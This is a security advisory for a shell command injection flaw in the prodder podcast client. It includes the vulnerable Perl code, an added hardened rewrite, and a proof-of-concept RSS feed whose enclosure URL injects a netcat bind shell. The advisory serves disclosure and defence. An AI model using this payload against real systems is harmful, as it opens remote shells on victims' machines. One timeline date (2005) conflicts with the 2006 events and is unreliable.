[UNIX] Prodder Arbitrary Command Execution



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Prodder Arbitrary Command Execution
------------------------------------------------------------------------


SUMMARY

Prodder <http://prodder.sourceforge.net/> is a command-line based Podcast
client written in Perl that runs on just about any Unix system. It
implements a few useful features that are lacking in many of the existing
tools, while remaining simple and light-weight.

A security flaw discovered in prodder makes it possible for a malicious
podcast server to remotely execute arbitrary shell commands on the
victim's client.

DETAILS

Vulnerable Systems:
* prodder versions 0.4 and prior.

Immune Systems:
* prodder version 0.5

Podcasting is the distribution of multimedia files over the internet.
Normally, a server provides an RSS or Atom XML feed describing where
to get the multimedia files. The client parses the feed and may then
download the desired files.

When prodder is used to fetch a podcast, it extracts the URL of the
audio file from the XML file the server provides. Prodder then uses
wget to fetch the file.

The source code looks as follows:
[...]
446 # Actually get the file
447 my $wget_cmd = "wget -qc -a '$conf{'errorfile'}' "
448 . "--tries=3 --timeout=20 --random-wait '$enc_url' -P '$outdir'";
449
450 # Background the wgets if needed - this will assume
451 # the downloads dont fail (once they've started)
452 $wget_cmd .= " --background" if $conf{'background'};
453
454
455
456 print "Fetching item ($enc_url)... ";
457 if (! system($wget_cmd))
[...]

Unfortunately, $enc_url, which holds the URL in line 448, is never properly
sanitized, so it is possible to include arbitrary shell commands in the
URL; because system() is called with a single command string, that string
is handed to /bin/sh, which executes them (see line 457).
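The following is an added example, not prodder's own code, showing the same download step rebuilt so that the enclosure URL can never reach /bin/sh as shell syntax. The wget options are the ones visible in the excerpt above; the function names (build_wget_cmd_vulnerable, validate_enclosure_url, build_wget_argv, fetch_item) and the two sample URLs are assumptions made for this illustration. It prints, side by side, the command string the vulnerable construction produces, the argument list the hardened construction produces, and the verdict of an allow-list check on the URL.

```perl
#!/usr/bin/perl
# Added example, not prodder's own code: the download step rebuilt so
# that the enclosure URL can never reach /bin/sh as shell syntax.
# Names (build_wget_cmd_vulnerable, validate_enclosure_url,
# build_wget_argv, fetch_item) and the sample URLs are assumptions.
use strict;
use warnings;

# Vulnerable pattern, mirroring prodder 0.4 lines 447-448: the URL is
# interpolated into one shell string. Included only to display the
# resulting command; it is never passed to system() in this script.
sub build_wget_cmd_vulnerable {
    my ($url, $errorfile, $outdir) = @_;
    return "wget -qc -a '$errorfile' "
         . "--tries=3 --timeout=20 --random-wait '$url' -P '$outdir'";
}

# Allow-list check: http(s) scheme followed only by characters that are
# legal in a URL. A single quote, whitespace, backtick, pipe, redirection
# and backslash are all rejected, so the quote-closing trick seen in the
# advisory fails even if the URL were still wrapped in quotes somewhere.
sub validate_enclosure_url {
    my ($url) = @_;
    return 0 unless defined $url;
    return 0 unless $url =~ m{^https?://[A-Za-z0-9._~:/?#\[\]\@!\$&()*+,;=%-]+$};
    return 1;
}

# Hardened pattern: build an argument list instead of a command string.
# system(LIST) with more than one element executes wget directly, so
# ';', '&', '#' or quotes inside $url are just bytes in argv[7].
sub build_wget_argv {
    my ($url, $errorfile, $outdir, $background) = @_;
    my @argv = ('wget', '-qc', '-a', $errorfile,
                '--tries=3', '--timeout=20', '--random-wait',
                $url, '-P', $outdir);
    push @argv, '--background' if $background;
    return @argv;
}

# Defensive download: validate first, then run wget without a shell.
sub fetch_item {
    my ($url, $errorfile, $outdir, $background) = @_;
    die "refusing suspicious enclosure URL: $url\n"
        unless validate_enclosure_url($url);
    my @argv = build_wget_argv($url, $errorfile, $outdir, $background);
    my $rc = system(@argv);      # list form: no /bin/sh involved
    return $rc == 0;
}

# Constructed sample inputs: a benign enclosure and one shaped like the
# advisory's proof of concept, with a harmless echo in place of netcat.
my @samples = (
    'http://www.example.com/example.mp3',
    q{http://www.example.com/example.mp3'; echo injected ;#'},
);

for my $url (@samples) {
    print "URL:       $url\n";
    print "as string: ", build_wget_cmd_vulnerable($url, 'errors.log', 'out'), "\n";
    print "argv:      ", join(' | ', build_wget_argv($url, 'errors.log', 'out', 0)), "\n";
    print "verdict:   ", (validate_enclosure_url($url) ? 'accepted' : 'rejected'), "\n\n";
}
```

Run it with perl; nothing is downloaded, since fetch_item is defined but not called in the demo. The second sample shows why single quotes around $enc_url are no defence: the quote in the URL closes the quoted argument and the rest of the string is parsed by the shell, whereas in the argv form the whole URL stays one argument. Of the two measures, the list form of system() is the one that actually removes the bug; the allow-list check is defence in depth and also catches feeds that are malformed for other reasons.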


Proof of Concept:
A minimal malicious server rss feed may look as follows:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting Example Malicious Server Feed</title>
<item>
<enclosure url="http://www.example.com/example.mp3'; nc -e /bin/sh
-l -p 1337 & ';#'" length="241734" type="audio/mpeg" />
</item>
</channel>
</rss>

The URL above will open port 1337 via netcat on the victim's computer and
bind a shell to it. This is just one example of how to exploit the
vulnerability, as arbitrary commands can be included in the URL, but it
should illustrate the point.

Workaround:
Do not use prodder with untrusted servers.

Fix:
Upgrade to prodder-0.5, which can be downloaded here:
<http://prdownloads.sourceforge.net/prodder/prodder-0.5.tgz?download>

Disclosure Timeline:
* 2006-05-18 Discovery of the problem
* 2006-05-19 Notification of the author
* 2006-05-19 Initial response of the author
* 2006-05-20 Fixed version of prodder is released
* 2005-05-22 Public release of the advisory without CVE number because of
public release by the author. CVE will be appended when available.


ADDITIONAL INFORMATION

The original article can be found at:
<http://www.redteam-pentesting.de/advisories/rt-sa-2006-002.txt>


